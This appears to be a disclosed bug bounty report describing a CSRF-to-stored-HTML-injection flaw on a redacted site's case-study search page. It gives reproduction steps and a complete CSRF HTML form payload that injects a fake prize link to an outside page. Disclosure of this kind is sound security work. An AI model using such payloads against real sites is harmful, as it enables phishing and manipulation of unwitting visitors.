**Description:** I have found out that on the https://www.███████ domain, you initiate POST request in order to look up for case studies, the parameter keyword on the request, allows the usage of bad characters such as < " ', although XSS payloads are pretty secured, HTML injection is an option. As you might notice because this is a POST request, and the content is not initiated by the URL, i need to chain it with CSRF so the victim will get presented the malicious infected page, which you will see on the Video PoC, even upon refreshing is remain infected with the injection, only when you open a new tab, the page rests. This allows me implementing malicious links and contents inside the case studies search page. ████████ ## Step-by-step Reproduction Instructions 1. Navigate to https://www.█████ 2. Craft a malicious HTML injection as you wish, I have injected: "<a href=https://naglinagli.github.io>Click here to win 1000$!</a>" 3. Save the POST request and craft CSRF payload. ## HTML snippet of the CSRF payload: ```javascript <html>  <body> <script>history.pushState('', '', '/')</script> <form action="https://www.███████" method="POST"> <input type="hidden" name="keyword" value="<a href=https://naglinagli.github.io>Click here to win 1000$!</a>" /> <input type="hidden" name="Find Case Studies" value="Find Case Studies" /> <input type="hidden" name="crimetype" value="none" /> <input type="hidden" name="year" value="none" /> <input type="hidden" name="gender" value="search.php" /> <input type="hidden" name="employeetype" value="none" /> <input type="hidden" name="age" value="none" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` ## Suggested Mitigation/Remediation Actions Sanitizing malicious characters on the keyword parameter. ##Best Regards, nagli ## Impact CSRF to Stored HTML injection on the case-studies search page.

CSRF to Stored HTML injection at https://www.█████

Vulnerability Details

Actions

Report Stats

Share this report